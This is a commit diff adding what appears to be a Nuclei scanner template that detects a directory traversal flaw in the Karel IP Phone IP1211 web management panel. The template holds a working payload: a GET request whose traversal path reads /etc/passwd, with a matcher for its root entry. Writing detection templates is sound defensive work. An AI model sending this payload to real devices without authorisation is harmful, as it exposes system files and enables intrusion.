Create karel-ip-phone-lfi.yaml
parent
1f403d4ddb
commit
99d51ba4bc
|
@ -0,0 +1,24 @@
|
|||
id: karel-ip-phone-lfi
|
||||
|
||||
info:
|
||||
name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
reference: https://cxsecurity.com/issue/WLB-2020100038
|
||||
tags: karel,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue